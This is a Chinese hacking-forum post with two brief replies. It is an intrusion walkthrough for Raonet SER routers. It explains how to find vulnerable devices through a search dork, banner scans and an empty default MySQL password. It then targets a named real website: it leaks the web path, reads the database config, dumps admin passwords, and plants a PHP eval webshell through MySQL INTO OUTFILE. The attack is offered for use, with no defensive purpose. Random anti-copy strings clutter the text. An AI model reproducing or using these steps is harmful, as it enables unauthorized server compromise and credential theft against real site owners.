中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
: L* D7 _- e. o) E; [8 V( I% t$ m/ h
2 k4 ^" \; s1 u. c2 N, A/ Y
1:google搜索'Raonet Subscriber Ethernet Router'
; I1 W1 o- Y$ g, S* c1 h
0 N: ~/ y7 g3 T3 t H
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
( N- D* `+ \! X' k6 S# `5 F& t% m
3 S6 t* I( x* {8 ]
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
1 l+ T4 O% \3 Q7 e
6 e/ A8 [' b' A h9 Z) W
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
; b3 [4 K, @6 G* `% H
) c9 I! n! x$ o) x1 m/ O' G
" O# {. h' w( B; O- \
9 G3 A5 V+ G6 ]! D( y3 }
入侵步骤:
! j; o; Y6 T$ D/ {6 ~
; T' Y" S- q1 q- y! \ u
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
3 Y) k9 G# C, j# {
' G* m0 ~% |, E. O! _" U( S# ]
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
2 I# p7 Z. D6 a2 A. s6 F, T
3:得到密码后连接,查看GUI管理密码:
5 f$ g$ S# v2 b+ E
use ser_500
6 i: n, C$ \8 U6 P- ~, m+ ]
select id,passwd from user;
3 w- [2 @3 z& `
4:通过数据库写入webshell,执行命令:
, ~ J& J4 }# ~8 J" A: X
use mysql;
0 Y0 l7 P; m# M8 _ V6 p# _% w. j
create table ok(cmd TEXT);
, b/ n0 r' M8 x
insert into ok values("<?php @eval($_POST[cmd])?>");
+ h$ F' a3 \0 `: n% U$ x) U ~1 A
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
5 w3 w& v2 k; r
drop table ok;
) m3 B; I: d ]
5 ]2 u a$ k c
5:连接后门shell.php
0 S/ `3 d6 _ H; {% F) L
3 u3 e- o( R x P' L' ~
6. 搞定!
7 Q& n r$ g3 h6 ^. C3 i
7 `7 y& D. z2 S" c& w; g
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2